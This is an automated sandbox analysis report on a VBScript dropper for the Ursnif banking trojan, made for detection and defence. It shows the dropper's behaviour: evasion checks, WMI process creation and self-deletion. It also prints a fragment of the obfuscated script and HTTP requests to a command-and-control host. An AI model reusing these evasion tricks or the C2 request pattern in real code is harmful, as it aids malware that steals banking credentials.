Analysis Report 0oV5opFE4RCv.vbs

Overview

General Information

Sample Name: 0oV5opFE4RCv.vbs
Analysis ID: 283387
MD5: 6398c206cfa397d1cac4a11692cc36a7
SHA1: b048cdeed7996f785709fa17403e3ffc026bd537
SHA256: dc4bf01e50d9506c3db81adb96050831647d50650a5349cefbf9eb651381f5c4

Detection

Ursnif
Score: 96
Range: 0 - 100
Whitelisted: false
Confidence: 100%

Signatures

Antivirus detection for dropped file
Benign windows process drops PE files
Multi AV Scanner detection for dropped file
VBScript performs obfuscated calls to suspicious functions
Yara detected Ursnif
Creates processes via WMI
Deletes itself after installation
Queries sensitive service information (via WMI, Win32_LogicalDisk, often done to detect sandboxes)
WScript reads language and country specific registry keys (likely country aware script)
Contains capabilities to detect virtual machines
Drops PE files
Drops files with a non-matching file extension (content does not match file extension)
Found WSH timer for Javascript or VBS script (likely evasive script)
Found dropped PE file which has not been started or loaded
Java / VBScript file with very long strings (likely obfuscated code)
May sleep (evasive loops) to hinder dynamic analysis
Queries sensitive Operating System Information (via WMI, Win32_ComputerSystem, often done to detect virtual machines)
Queries sensitive processor information (via WMI, Win32_Processor, often done to detect virtual machines)
Queries the volume information (name, serial number etc) of a device

Classification

AV Detection:

Antivirus detection for dropped file
Source: C:\Users\user\AppData\Local\Temp\duke.dxf Avira: detection malicious, Label: TR/AD.UrsnifDropper.kiiwe
Multi AV Scanner detection for dropped file
Source: C:\Users\user\AppData\Local\Temp\duke.dxf Virustotal: Detection: 10%
Source: C:\Users\user\AppData\Local\Temp\duke.dxf ReversingLabs: Detection: 16%
Source: C:\Windows\System32\wscript.exe File opened: C:\Users\user
Source: C:\Windows\System32\wscript.exe File opened: C:\Users\user\AppData
Source: C:\Windows\System32\wscript.exe File opened: C:\Users\user\AppData\Local\Temp
Source: C:\Windows\System32\wscript.exe File opened: C:\Users\user\Desktop\desktop.ini
Source: C:\Windows\System32\wscript.exe File opened: C:\Users\user\Documents\desktop.ini
Source: C:\Windows\System32\wscript.exe File opened: C:\Users\user\AppData\Local
Source: global traffic HTTP traffic detected:
  GET /api1/_2BEA710c1_2Bh/T2r6BJUJQaWNLC0gufW8M/YXMXh7wy00YQ3XQN/roi2nG7DMn6F_2F/FHcK767s_2F6csKKZK/vNu_2B8Lo/_2BPDHqlOM5jKs6AmQPI/IhEdup0oMjwDY9EhZgF/d6WrafOV7lUIf2xBs5bUae/EokL8M9Sa2_2F/WXjyd_2B/nprRIOoFTuo_2F8yRcgc9mV/Pn1cx92RVq/AOEXsVZ5jdrADthNF/PULhKiT1Fpst/J0Y9Sf_2BhN/PzynmT2w5CX4i_/2FdD0HYdgp_2Fa_0A_0DB/_2BZF563CbVTBSBv/KfVhp_2Fq2J_2Bj/noL7CjwCKkJ_2FirYZ/dQrvsLWIs/s8GVCIbfqnlg3cg/wm HTTP/1.1
  Accept: text/html, application/xhtml+xml, image/jxr, */*
  Accept-Language: en-US
  User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; Trident/7.0; rv:11.0) like Gecko
  Accept-Encoding: gzip, deflate
  Host: api10.laptok.at
  Connection: Keep-Alive
Source: global traffic HTTP traffic detected:
  GET /api1/7k_2B8mbUiH51kFBwdUVd/Zd7a_2Bd_2Fa8B1t/W2qeoE0fiseq8yM/4C_2BbcVuknr4yOUVH/llcIl59j9/C_2FCa_2FhZE5ibrDyyF/_2F7EJtliCRiiG1RqNa/Dou4T0ee1p0NkVbHpISSil/TEImXGOJwrhwK/kmClxim1/nFu9dL9oMJNFcU97eAXH9fs/kGbVWmL1Yj/6ropP4k67E8w7w9nT/d2F8bA6YDYCf/_2Bm9WMAR4E/vOjGFJ80eaxwHV/9xgVg6G4XF3VoKfnqtTJ_/0A_0DZHP6Gs0hjAA/vRspXcsorp9s73Y/ViZ7TDS2Sy2FkTJXf/mbHT HTTP/1.1
  Accept: text/html, application/xhtml+xml, image/jxr, */*
  Accept-Language: en-US
  User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; Trident/7.0; rv:11.0) like Gecko
  Accept-Encoding: gzip, deflate
  Host: api10.laptok.at
  Connection: Keep-Alive
Source: msapplication.xml1.16.dr String found in binary or memory: <browserconfig><msapplication><config><site src="http://www.facebook.com/"/><date>0x245d4ed2,0x01d686fe</date><accdate>0x245d4ed2,0x01d686fe</accdate></config><tile><wide310x150logo/><square310x310logo/><square70x70logo/></tile></msapplication></browserconfig> equals www.facebook.com (Facebook)
Source: msapplication.xml1.16.dr String found in binary or memory: <browserconfig><msapplication><config><site src="http://www.facebook.com/"/><date>0x245d4ed2,0x01d686fe</date><accdate>0x245d4ed2,0x01d686fe</accdate></config><tile><wide310x150logo/><square310x310logo/><square70x70logo/><favorite src="C:\Users\user\Favorites\Facebook.url"/></tile></msapplication></browserconfig> equals www.facebook.com (Facebook)
Source: msapplication.xml6.16.dr String found in binary or memory: <browserconfig><msapplication><config><site src="http://www.twitter.com/"/><date>0x2462137e,0x01d686fe</date><accdate>0x2462137e,0x01d686fe</accdate></config><tile><wide310x150logo/><square310x310logo/><square70x70logo/></tile></msapplication></browserconfig> equals www.twitter.com (Twitter)
Source: msapplication.xml6.16.dr String found in binary or memory: <browserconfig><msapplication><config><site src="http://www.twitter.com/"/><date>0x2462137e,0x01d686fe</date><accdate>0x2462137e,0x01d686fe</accdate></config><tile><wide310x150logo/><square310x310logo/><square70x70logo/><favorite src="C:\Users\user\Favorites\Twitter.url"/></tile></msapplication></browserconfig> equals www.twitter.com (Twitter)
Source: msapplication.xml8.16.dr String found in binary or memory: <browserconfig><msapplication><config><site src="http://www.youtube.com/"/><date>0x2462137e,0x01d686fe</date><accdate>0x2462137e,0x01d686fe</accdate></config><tile><wide310x150logo/><square310x310logo/><square70x70logo/></tile></msapplication></browserconfig> equals www.youtube.com (Youtube)
Source: msapplication.xml8.16.dr String found in binary or memory: <browserconfig><msapplication><config><site src="http://www.youtube.com/"/><date>0x2462137e,0x01d686fe</date><accdate>0x2462137e,0x01d686fe</accdate></config><tile><wide310x150logo/><square310x310logo/><square70x70logo/><favorite src="C:\Users\user\Favorites\Youtube.url"/></tile></msapplication></browserconfig> equals www.youtube.com (Youtube)
Source: unknown DNS traffic detected: queries for: api10.laptok.at
Source: global traffic HTTP traffic detected:
  HTTP/1.1 404 Not Found
  Server: nginx
  Date: Wed, 09 Sep 2020 14:08:04 GMT
  Content-Type: text/html; charset=utf-8
  Transfer-Encoding: chunked
  Connection: close
  Vary: Accept-Encoding
  Content-Encoding: gzip
  Data Raw: 36 61 0d 0a 1f 8b 08 00 00 00 00 00 00 03 b3 c9 28 c9 cd b1 e3 e5 b2 c9 48 4d 4c b1 b3 29 c9 2c c9 49 b5 33 31 30 51 f0 cb 2f 51 70 cb 2f cd 4b b1 d1 87 08 da e8 83 95 00 95 26 e5 a7 54 82 e8 e4 d4 bc 92 d4 22 3b 9b 0c 43 74 1d 40 11 1b 7d a8 34 c8 6c a0 22 28 2f 2f 3d 33 af 02 59 4e 1f 66 9a 3e d4 25 00 0b d9 61 33 92 00 00 00 0d 0a 30 0d 0a 0d 0a
  Data Ascii: 6a(HML),I310Q/Qp/K&T";Ct@}4l"(//=3YNf>%a30
Source: msapplication.xml.16.dr String found in binary or memory: http://www.amazon.com/
Source: msapplication.xml2.16.dr String found in binary or memory: http://www.google.com/
Source: msapplication.xml3.16.dr String found in binary or memory: http://www.live.com/
Source: msapplication.xml4.16.dr String found in binary or memory: http://www.nytimes.com/
Source: msapplication.xml5.16.dr String found in binary or memory: http://www.reddit.com/
Source: msapplication.xml6.16.dr String found in binary or memory: http://www.twitter.com/
Source: msapplication.xml7.16.dr String found in binary or memory: http://www.wikipedia.com/
Source: msapplication.xml8.16.dr String found in binary or memory: http://www.youtube.com/

Key, Mouse, Clipboard, Microphone and Screen Capturing:

Yara detected Ursnif
Source: Yara match File source: 00000003.00000003.508934495.0000000005B18000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match File source: 00000003.00000003.508764194.0000000005B18000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match File source: 00000003.00000003.508813233.0000000005B18000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match File source: 00000003.00000003.508859904.0000000005B18000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match File source: 00000003.00000003.509125210.0000000005B18000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match File source: 00000003.00000003.509088991.0000000005B18000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match File source: 00000003.00000003.509004405.0000000005B18000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match File source: 00000003.00000003.508968105.0000000005B18000.00000004.00000040.sdmp, type: MEMORY

E-Banking Fraud:

Yara detected Ursnif
Source: Yara match File source: 00000003.00000003.508934495.0000000005B18000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match File source: 00000003.00000003.508764194.0000000005B18000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match File source: 00000003.00000003.508813233.0000000005B18000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match File source: 00000003.00000003.508859904.0000000005B18000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match File source: 00000003.00000003.509125210.0000000005B18000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match File source: 00000003.00000003.509088991.0000000005B18000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match File source: 00000003.00000003.509004405.0000000005B18000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match File source: 00000003.00000003.508968105.0000000005B18000.00000004.00000040.sdmp, type: MEMORY

System Summary:

Java / VBScript file with very long strings (likely obfuscated code)
Source: 0oV5opFE4RCv.vbs Initial sample: Strings found which are bigger than 50
Source: duke.dxf.0.dr Static PE information: Section: .text IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_READ
Source: classification engine Classification label: mal96.troj.evad.winVBS@7/21@2/1
Source: C:\Program Files\internet explorer\iexplore.exe File created: C:\Users\user\AppData\Local\Microsoft\Internet Explorer\Recovery\High
Source: C:\Windows\System32\wscript.exe File created: C:\Users\user\AppData\Local\Temp\adobe.url
Source: unknown Process created: C:\Windows\System32\wscript.exe C:\Windows\System32\wscript.exe 'C:\Users\user\Desktop\0oV5opFE4RCv.vbs'
Source: C:\Windows\System32\wscript.exe WMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Processor
Source: C:\Windows\System32\wscript.exe WMI Queries: IWbemServices::ExecMethod - root\cimv2 : Win32_Process::Create
Source: C:\Windows\System32\wscript.exe File read: C:\Users\desktop.ini
Source: C:\Windows\System32\wscript.exe Key opened: HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers
Source: unknown Process created: C:\Windows\System32\wscript.exe C:\Windows\System32\wscript.exe 'C:\Users\user\Desktop\0oV5opFE4RCv.vbs'
Source: unknown Process created: C:\Program Files\internet explorer\iexplore.exe 'C:\Program Files\Internet Explorer\iexplore.exe' -Embedding
Source: unknown Process created: C:\Program Files (x86)\Internet Explorer\iexplore.exe 'C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE' SCODEF:6312 CREDAT:17410 /prefetch:2
Source: unknown Process created: C:\Program Files\internet explorer\iexplore.exe 'C:\Program Files\Internet Explorer\iexplore.exe' -Embedding
Source: unknown Process created: C:\Program Files (x86)\Internet Explorer\iexplore.exe 'C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE' SCODEF:6632 CREDAT:17410 /prefetch:2
Source: C:\Program Files\internet explorer\iexplore.exe Process created: C:\Program Files (x86)\Internet Explorer\iexplore.exe 'C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE' SCODEF:6312 CREDAT:17410 /prefetch:2
Source: C:\Program Files\internet explorer\iexplore.exe Process created: C:\Program Files (x86)\Internet Explorer\iexplore.exe 'C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE' SCODEF:6632 CREDAT:17410 /prefetch:2
Source: C:\Windows\System32\wscript.exe Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{B54F3741-5B07-11cf-A4B0-00AA004A55E8}\InprocServer32
Source: Window Recorder Window detected: More than 3 window changes detected
Source: C:\Program Files (x86)\Internet Explorer\iexplore.exe Key opened: HKEY_CURRENT_USER\Software\Microsoft\Office\16.0\Lync
Source: 0oV5opFE4RCv.vbs Static file information: File size 1089538 > 1048576
Source: C:\Program Files (x86)\Internet Explorer\iexplore.exe File opened: C:\Program Files (x86)\Java\jre1.8.0_211\bin\msvcr100.dll
Source: Binary string: c:\Street\Sit\Kind\41\Has\4\47\Well\43\how\Color\72\94\Melody.pdb source: wscript.exe, 00000000.00000003.388923615.000001B74881E000.00000004.00000001.sdmp, duke.dxf.0.dr

Data Obfuscation:

VBScript performs obfuscated calls to suspicious functions
Source: C:\Windows\System32\wscript.exe Anti Malware Scan Interface: WScript.ScriptName, cStr(246200227)) > 0 And levitate720 = 0) Then' point Ridgway candle707 Somers sent refract Pandanus despise peafowl dodge, 7404329 gore Morrill viviparous carport293 apologetic don incubi Disneyland Ethel McNally righteous insatiable continuant highroad Apocrypha convocate substantial detent collision seven model. 1978249 parley764 Ferguson Baptiste afire breadth91 childrearing pity853, philosophy McCormick francium peahen, palsy. callosity every pinafore typic heater twin Gouda172 physician. linemen orchard fauna adopt mustang Newman at sailor555 pneumonia amanuensis demerit Bruce Alexandre brow itch studio insignia edematous ago208 huckleberry prognosticate invest thrust lemma, violate subtrahend exhibit excess. plaguey742 snap Johnny insult communicate actinide trip Slocum whimsy nilpotent Exit FunctionREM bel Rafferty pipetting debris mantel Aitken176 codetermine Tyson Serpens899 build, matchbook720 mastermind. 4929032 cipher, tropospheric survivor oxygenate900. 1509755 Pliocene adenoma steelmake, 8199894 ivy depth821 Africa oligopoly. moribund, 953531 molybdenite929 Africa134 formal macintosh. men195 silt praise insouciant65 husband. 6578432 dextrous929 End Ifblouse198 = ((38 + (798 - (44 + (-41.0)))) - 830.0)ivxHAV = (((7 - 2.0) + (36 + 3530.0)) - 3568.0)If CreateObject("Scripting.FileSystemObject").GetFolder(mulligan).Files.Count < blouse198 ThenREM littermate niggardly mongoose themselves226 zagging gratuitous bluegrass271 citizen fluoresce jocose, 3109838 tree nourish injurious207 frost vast avert873 AZ Masonite Martinson amaranth Selkirk carbide tapir, evaluable cellophane771 allegro pinxter695 quitter Potts flounder provocation539 dun mysterious448 Theodosian, Eloise shade368REM wiremen964 focal cyclopean Copeland shant tofu. Rockwell, benchmark top Wilfred declassify tubule Jordan Alberich prosaic alleviate756 raffia. 
302350 conformation Szilard stickleback sarcasm. 9357275 schemata Grimaldi sidle livre tulip Josef tongue sortie withdrew. 1408844 Sigmund loanword Starkey Leonardo158 lepidopterist twinkle agog Pierson cream. 7225090 girlish illegitimacy63 daddy438 neath citywide antarctic, Trevelyan loris, 2767450 inferno inapt shun nitty peltry Kepler rs511, Atalanta combatted passband consulate give leftward Maddox Michelin fracture treble apparition grief liquid septennial536 vinyl gander. stuffy polka aesthete358 aileron Vida courier Fulbright OConnell153 octal inferior End IfSet typeset = CreateObject("WScript.Shell")delectate = typeset.ExpandEnvironmentStrings("%USERPROFILE%") + "\Downloads\"If CreateObject("Scripting.FileSystemObject").GetFolder(delectate).Files.Count < ivxHAV Then' eke adoptive. fashion ado Giuliano position861 Kitakyushu380 diverge attributive barrack416 towel Nebuchadnezzar heard retard bunt. appertain spatlum swain. Lou854 stellar ingot887 permeate potash gauleiter miscegenation, cavort beneath Trobriand tecum feedback Fiji Paleolithic mesquite pentane750 aile365 hailstone A
Source: initial sample Static PE information: section name: .text entropy: 6.83975931018

Persistence and Installation Behavior:

Creates processes via WMI
Source: C:\Windows\System32\wscript.exe WMI Queries: IWbemServices::ExecMethod - root\cimv2 : Win32_Process::Create
Drops PE files
Source: C:\Windows\System32\wscript.exe File created: C:\Users\user\AppData\Local\Temp\duke.dxf
Drops files with a non-matching file extension (content does not match file extension)
Source: C:\Windows\System32\wscript.exe File created: C:\Users\user\AppData\Local\Temp\duke.dxf

Hooking and other Techniques for Hiding and Protection:

Yara detected Ursnif
Source: Yara match File source: 00000003.00000003.508934495.0000000005B18000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match File source: 00000003.00000003.508764194.0000000005B18000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match File source: 00000003.00000003.508813233.0000000005B18000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match File source: 00000003.00000003.508859904.0000000005B18000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match File source: 00000003.00000003.509125210.0000000005B18000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match File source: 00000003.00000003.509088991.0000000005B18000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match File source: 00000003.00000003.509004405.0000000005B18000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match File source: 00000003.00000003.508968105.0000000005B18000.00000004.00000040.sdmp, type: MEMORY
Deletes itself after installation
Source: C:\Windows\System32\wscript.exe File deleted: c:\users\user\desktop\0ov5opfe4rcv.vbs
Source: C:\Windows\System32\wscript.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\wscript.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\wscript.exe Process information set: NOOPENFILEERRORBOX

Malware Analysis System Evasion:

Queries sensitive service information (via WMI, Win32_LogicalDisk, often done to detect sandboxes)
Source: C:\Windows\System32\wscript.exe WMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_LogicalDisk
WScript reads language and country specific registry keys (likely country aware script)
Source: C:\Windows\System32\wscript.exe Key value queried: HKEY_CURRENT_USER\Control Panel\International\Geo Nation
Source: C:\Windows\System32\wscript.exe Key value queried: HKEY_CURRENT_USER\Control Panel\International\Geo Nation
Source: C:\Windows\System32\wscript.exe Key value queried: HKEY_CURRENT_USER\Control Panel\International\Geo Nation
Source: C:\Windows\System32\wscript.exe Key value queried: HKEY_CURRENT_USER\Control Panel\International\Geo Nation
Contains capabilities to detect virtual machines
Source: C:\Windows\System32\wscript.exe File opened / queried: SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#5&280b647&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}
Found WSH timer for Javascript or VBS script (likely evasive script)
Source: C:\Windows\System32\wscript.exe Window found: window name: WSH-Timer
Found dropped PE file which has not been started or loaded
Source: C:\Windows\System32\wscript.exe Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\duke.dxf
May sleep (evasive loops) to hinder dynamic analysis
Source: C:\Windows\System32\wscript.exe TID: 6224 Thread sleep time: -30000s >= -30000s
Queries sensitive Operating System Information (via WMI, Win32_ComputerSystem, often done to detect virtual machines)
Source: C:\Windows\System32\wscript.exe WMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_ComputerSystem
Queries sensitive processor information (via WMI, Win32_Processor, often done to detect virtual machines)
Source: C:\Windows\System32\wscript.exe WMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Processor
Source: C:\Windows\System32\wscript.exe File Volume queried: C:\Users\user\AppData\Local FullSizeInformation
Source: C:\Windows\System32\wscript.exe File Volume queried: C:\Users\user\AppData\Local\Temp FullSizeInformation
Source: C:\Windows\System32\wscript.exe File opened: C:\Users\user
Source: C:\Windows\System32\wscript.exe File opened: C:\Users\user\AppData
Source: C:\Windows\System32\wscript.exe File opened: C:\Users\user\AppData\Local\Temp
Source: C:\Windows\System32\wscript.exe File opened: C:\Users\user\Desktop\desktop.ini
Source: C:\Windows\System32\wscript.exe File opened: C:\Users\user\Documents\desktop.ini
Source: C:\Windows\System32\wscript.exe File opened: C:\Users\user\AppData\Local
Source: wscript.exe, 00000000.00000002.412846909.000001B7493C0000.00000002.00000001.sdmp Binary or memory string: A Virtual Machine could not be started because Hyper-V is not installed.
Source: wscript.exe, 00000000.00000002.412846909.000001B7493C0000.00000002.00000001.sdmp Binary or memory string: A communication protocol error has occurred between the Hyper-V Host and Guest Compute Service.
Source: wscript.exe, 00000000.00000002.412846909.000001B7493C0000.00000002.00000001.sdmp Binary or memory string: The communication protocol version between the Hyper-V Host and Guest Compute Services is not supported.
Source: wscript.exe, 00000000.00000002.412846909.000001B7493C0000.00000002.00000001.sdmp Binary or memory string: An unknown internal message was received by the Hyper-V Compute Service.

HIPS / PFW / Operating System Protection Evasion:

Benign windows process drops PE files
Source: C:\Windows\System32\wscript.exe File created: duke.dxf.0.dr

Language, Device and Operating System Detection:

Queries the volume information (name, serial number etc) of a device
Source: C:\Windows\System32\wscript.exe Queries volume information: C:\Users\user\AppData\Local\Temp\corolla.zip VolumeInformation
Source: C:\Windows\System32\wscript.exe Queries volume information: C:\Users\user\AppData\Local\Temp\corolla.zip VolumeInformation
Source: C:\Windows\System32\wscript.exe Queries volume information: C:\Users\user\AppData\Local\Temp\corolla.zip VolumeInformation
Source: C:\Windows\System32\wscript.exe Queries volume information: C:\Users\user\AppData\Local\Temp\corolla.zip VolumeInformation
Source: C:\Windows\System32\wscript.exe Queries volume information: C:\Users\user\AppData\Local\Temp\corolla.zip VolumeInformation
Source: C:\Windows\System32\wscript.exe Queries volume information: C:\Users\user\AppData\Local\Temp\corolla.zip VolumeInformation
Source: C:\Windows\System32\wscript.exe Queries volume information: C:\Users\user\AppData\Local\Temp\corolla.zip VolumeInformation
Source: C:\Windows\System32\wscript.exe Queries volume information: C:\Users\user\AppData\Local\Temp\corolla.zip VolumeInformation
Source: C:\Windows\System32\wscript.exe Queries volume information: C:\Users\user\AppData\Local\Temp\corolla.zip VolumeInformation
Source: C:\Windows\System32\wscript.exe Queries volume information: C:\Users\user\AppData\Local\Temp\corolla.zip VolumeInformation
Source: C:\Windows\System32\wscript.exe Queries volume information: C:\Users\user\AppData\Local\Temp\corolla.zip VolumeInformation
Source: C:\Windows\System32\wscript.exe Queries volume information: C:\Users\user\AppData\Local\Temp\corolla.zip VolumeInformation
Source: C:\Windows\System32\wscript.exe Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuid

Stealing of Sensitive Information:

Yara detected Ursnif
Source: Yara match File source: 00000003.00000003.508934495.0000000005B18000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match File source: 00000003.00000003.508764194.0000000005B18000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match File source: 00000003.00000003.508813233.0000000005B18000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match File source: 00000003.00000003.508859904.0000000005B18000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match File source: 00000003.00000003.509125210.0000000005B18000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match File source: 00000003.00000003.509088991.0000000005B18000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match File source: 00000003.00000003.509004405.0000000005B18000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match File source: 00000003.00000003.508968105.0000000005B18000.00000004.00000040.sdmp, type: MEMORY

Remote Access Functionality:

Yara detected Ursnif
Source: Yara match File source: 00000003.00000003.508934495.0000000005B18000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match File source: 00000003.00000003.508764194.0000000005B18000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match File source: 00000003.00000003.508813233.0000000005B18000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match File source: 00000003.00000003.508859904.0000000005B18000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match File source: 00000003.00000003.509125210.0000000005B18000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match File source: 00000003.00000003.509088991.0000000005B18000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match File source: 00000003.00000003.509004405.0000000005B18000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match File source: 00000003.00000003.508968105.0000000005B18000.00000004.00000040.sdmp, type: MEMORY